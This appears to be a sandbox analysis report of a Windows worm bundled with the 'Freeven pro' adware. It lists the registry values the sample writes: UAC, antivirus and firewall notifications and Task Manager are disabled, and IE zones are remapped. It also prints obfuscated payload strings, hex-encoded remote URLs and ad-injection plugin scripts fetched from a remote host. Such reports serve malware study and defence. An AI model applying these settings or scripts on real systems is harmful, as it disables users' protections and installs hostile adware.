[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppName" = "Freeven pro-bg.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"DisplayName" = "Freeven pro"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppPath" = "%Program Files%\Freeven pro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"DisplayIcon" = "%Program Files%\Freeven pro\utils.exe"

"Publisher" = "Freeven"

[HKLM\SOFTWARE\Freeven pro\Installer]
"BundledIe" = "1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppName" = "Freeven pro-bg.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppPath" = "%Program Files%\Freeven pro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"CrAppId" = "54248"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppName" = "Freeven pro-codedownloader.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 1E 98 3B FA 27 D3 5F E6 DB 60 96 9F D9 33 E6"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"Policy" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppName" = "Freeven pro-codedownloader.exe"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cb254c33-3cc0-4efd-8ccb-f7b15cfb57f5}]
"AppPath" = "%Program Files%\Freeven pro"

[HKLM\SOFTWARE\Freeven pro\Installer]
"BundledChrome" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1860 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"

[HKCU\Software\Aas]
"a1_0" = "3432392762"

[HKCU\Software\Aas\695404737]
"35845605" = "476"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Aas\695404737]
"50183847" = "83AD022F944CCF21DDECD41871254667172BA39F3E949513F4CC29B07060AC534912E5BCB155880C2C4326E6FB83E6FA099D4219F6885291D527824C5507229614A07CE2AF035D97263FF7F26AD2ACC9D5D4395D4B8B3109DC5C0C87B31A1505E6E94E08EF20E71B91B96D3856F531DADFD78A894AD6A6C177136C5657B01661"
"43014726" = "0C00687474703A2F2F7777772E6C656479617A696C696D2E636F6D2F6C6F676F2E67696600687474703A2F2F6B73616E64726166617368696F6E2E636F6D2F6C6F676F2E67696600687474703A2F2F7777772E6C6166796572692E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6B756C7070617375722E636F6D2F6C6F676F2E67696600687474703A2F2F746F616C6C616465706170656C2E636F6D2E61722F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E65636F6C652D7361696E742D73696D6F6E2E6E65742F696E6465785F746F702F6C6F676F2E67696600687474703A2F2F6C617A617265612E726F2F696D616765732F6C6F676F2E67696600687474703A2F2F6B6F6F6E6164616E6365322E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6B75706C752E62656C2E74722F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E6C69646572616E636173706F6C6974696361732E636F6D2E62722F6C6F676F2E67696600687474703A2F2F7777772E6C6567616C62696C676973617961722E636F6D2F696D672F6C6F676F2E67696600687474703A2F2F6C696665636F6D32342E636F2E63632F696D616765732F6C6F676F2E676966"

[HKCU\Software\Aas]
"a3_0" = "17001001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"

[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "144"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"

[HKCU\Software\Aas\695404737]
"21507363" = "0"
"28676484" = "35"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A FD FA BB EA 61 DD 80 E7 D5 ED 3C F1 85 44 26"

[HKCU\Software\Aas]
"a2_0" = "5517"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas]
"a4_0" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"

Task Manager is disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"

The process 875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe:1180 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 39 13 D7 37 B7 61 90 FA 78 35 BD F7 FF B6 0D"

The process 875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe:508 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 8F CB F6 60 FA 98 AE 6F 69 75 B0 95 35 D0 20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process WINMINE.EXE:1048 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 B5 46 A7 6F AF E2 6A 7E 95 1F 16 75 E6 3D 2B"

The process WINMINE.EXE:3776 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A E2 E1 83 7B 44 76 38 04 07 94 2A 66 5B 7E 80"

The process WINMINE.EXE:544 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 45 2D DF A8 89 E0 A3 8C 14 F3 A9 D5 80 FF AC"

The process Freeven pro-codedownloader.exe:2144 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Freeven pro\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se6"

[HKCU\Software\Freeven pro\Plugins\42]
"Name" = "IEInternal"

[HKCU\Software\Freeven pro\Plugins\390]
"Version" = "1"

[HKCU\Software\Freeven pro\Plugins\39]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\47]
"Name" = "resources_background"

[HKCU\Software\Freeven pro\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmIya6"

[HKCU\Software\Freeven pro\Plugins\4]
"Name" = "jquery_1_7_1"

[HKCU\Software\Freeven pro\Plugins\78]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/78.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Freeven pro\Plugins\14]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/14.js"

[HKCU\Software\Freeven pro\Plugins\288]
"Name" = "firstoffer_pricecomp_m"

[HKCU\Software\Freeven pro\Plugins\2]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/2.js"

[HKCU\Software\Freeven pro\Plugins\40]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\102]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/102.js"

[HKCU\Software\Freeven pro\Plugins\345]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/345.js"

[HKCU\Software\Freeven pro\Manifest]
"Manifest" = "NA"

[HKCU\Software\Freeven pro\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi6"

[HKCU\Software\Freeven pro\Plugins\47]
"Version" = "3"

[HKCU\Software\Freeven pro\Manifest]
"IsButtonEnabled" = "false"

[HKCU\Software\Freeven pro\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) { if (appAPI.internal.monetization.getCampaignId() == 0) { appAPI.internal.monetization.loader.setCampaignId(1026); } }};"

[HKCU\Software\Freeven pro\Plugins\36]
"Name" = "IEBackground"

[HKCU\Software\Freeven pro\Plugins\345]
"Name" = "pluginsVerticals"

[HKCU\Software\Freeven pro\Manifest]
"PublisherName" = "Freeven"

[HKCU\Software\Freeven pro\Plugins\354]
"Version" = "2"

[HKCU\Software\Freeven pro\Plugins\45]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\180]
"Version" = "12"

[HKCU\Software\Freeven pro\Plugins\380]
"Name" = "callcenter_j_m"

[HKCU\Software\Freeven pro\Plugins\334]
"Name" = "sharonl_ws_m"

[HKCU\Software\Freeven pro\Plugins\376]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/376.js"

[HKCU\Software\Freeven pro\Plugins\273]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/273.js"

[HKCU\Software\Freeven pro\Plugins\288]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/288.js"

[HKCU\Software\Freeven pro\Manifest]
"Version" = "111"

[HKCU\Software\Freeven pro\Plugins\9]
"Version" = "3"

[HKCU\Software\Freeven pro\Plugins\273]
"Name" = "aedgency_back_button_m"

[HKCU\Software\Freeven pro\Plugins\180]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/180.js"

[HKCU\Software\Freeven pro\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

[HKCU\Software\Freeven pro\Manifest]
"Description" = "Feven Shopping Companion"

[HKCU\Software\Freeven pro\Plugins\220]
"Name" = "icm_base_m"

[HKCU\Software\Freeven pro\Plugins\91]
"Name" = "monetizationLoader.js"

[HKCU\Software\Freeven pro\Plugins\13]
"Name" = "CrossriderAppUtils"

[HKCU\Software\Freeven pro\Plugins\43]
"Name" = "IEMessaging"

[HKCU\Software\Freeven pro\Plugins\230]
"Version" = "7"

[HKCU\Software\Freeven pro\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n6"

[HKCU\Software\Freeven pro\Plugins\64]
"Version" = "3"

[HKCU\Software\Freeven pro\Plugins\180]
"Name" = "bpo_serp_m"

[HKCU\Software\Freeven pro\Plugins\200]
"Name" = "foxydeal_m"

[HKCU\Software\Freeven pro\Plugins\41]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/41.js"

[HKCU\Software\Freeven pro\Plugins\43]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/43.js"

[HKCU\Software\Freeven pro\Plugins\7]
"Version" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Freeven pro\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve6"

[HKCU\Software\Freeven pro\Plugins\220]
"Version" = "38"

[HKCU\Software\Freeven pro\Plugins\195]
"Version" = "28"

[HKCU\Software\Freeven pro\Manifest]
"RunInFrame" = "false"
"ChangePrevious" = "false"

[HKCU\Software\Freeven pro\Plugins\253]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/253.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Freeven pro\Plugins\45]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/45.js"

[HKCU\Software\Freeven pro\Plugins\94]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/94.js"

[HKCU\Software\Freeven pro\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\Freeven pro\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functi6"

[HKCU\Software\Freeven pro\Manifest]
"EnableSearchIE" = "false"

[HKCU\Software\Freeven pro\Plugins\391]
"Version" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Freeven pro\Plugins\17]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\193]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/193.js"

[HKCU\Software\Freeven pro\Plugins\78]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\246]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/246.js"

[HKCU\Software\Freeven pro\Plugins\345]
"JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390],intext:[103,117,123,142,259,263,342,359,360,391],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389]};"

[HKCU\Software\Freeven pro\Plugins\4]
"URL" = "http://js.ourstatsstaticstack.com/plugins/javascripts/jquery-1_7_1_min.js"

[HKCU\Software\Freeven pro\Plugins\260]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\281]
"Version" = "3"

[HKCU\Software\Freeven pro\Debug]
"IsDebuggingPlugins" = "0"

[HKCU\Software\Freeven pro\Plugins\64]
"Name" = "appApiMessage"

[HKCU\Software\Freeven pro\Plugins\260]
"Name" = "pricedetect_sidebar_m"

[HKCU\Software\Freeven pro\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

[HKCU\Software\Freeven pro\Plugins\13]
"Version" = "7"

[HKCU\Software\Freeven pro\Manifest]
"homepageurl" = "NA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Freeven pro\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,345,354,253,102,180,184,193,220,195,200,221,223,230,233,242,260,273,281,288,334,375,380,390,391,91"

[HKCU\Software\Freeven pro\Plugins\390]
"Name" = "50pops_new_m"

[HKCU\Software\Freeven pro\Plugins\391]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk0YjAwMWYwMTE3MmQxYTFlNTM1ODRiMDAxZjAxMTc0MjQ3NWQxMjA2MDcwYjBhMTYwZjFkNDUxMzVmMDMwMjA5MDYxNDBlMTAwYzVjMWYwNzFkNDcxODAwMDU1NzAwNDI0ODVhNWIwYTBlNWEzODI3MmIyMDNlMzEzYTNhMjIzMTIyMmEzNzM3MjkzNjJjMjYyZjMwMjMyNzNiMjczMzNkMjAyYzM0MmE0ODE0NDYxODAyNWQxOTAxMGY0ODU1NGE1MTQ2NTcwNzExMWM1NjJhMzgzYjNhM2QyMjMxM2IyMTJmMzAzNTI3MjkyMjIxM2QyNzI5MjYzMDM4Mjc0YTVlNTMwYTFkMWMxYjA2MzIwYTA0NTA0YjQwMDExYzFmMDUxNDQyNDc1ZDEyMDYwNzBiMGExNjBmMWQ0NTEzNWYwMzAyMDkwNjE0MGUxMDBjNWMxZjA3MWQ0NzE4MDAwNTU3MDA0MjQ4NWE1YjBhMGU1YTM4MjcyYjIwM2UzMTNhM2EyMjMxMjIyYTM3MzcyOTM2MmMyNjJmMzAyMzI3M2IyNzMzM2QyMDJjMzQyYTQ4MTQ0NjE4MDI1ZDE5MDEwZjQ4NTU0YTUxNDY1NzA3MTExYzU2MmEzODNiM2EzZDIyMzEzYjIxMmYzMDM1MjcyOTIyMjEzZDI3MjkyNjMwMzgyNzRhNWU1MzEyMDUxZDBjMWMwOTMxMGM1MDRiNTE1MDU5MTY=', 'bihkugxhrq'); }"

[HKCU\Software\Freeven pro\Plugins\46]
"Name" = "IETimers"

[HKCU\Software\Freeven pro\Plugins\242]
"Name" = "price_gong_m"

[HKCU\Software\Freeven pro\Plugins\91]
"Version" = "135"

[HKCU\Software\Freeven pro\Plugins\260]
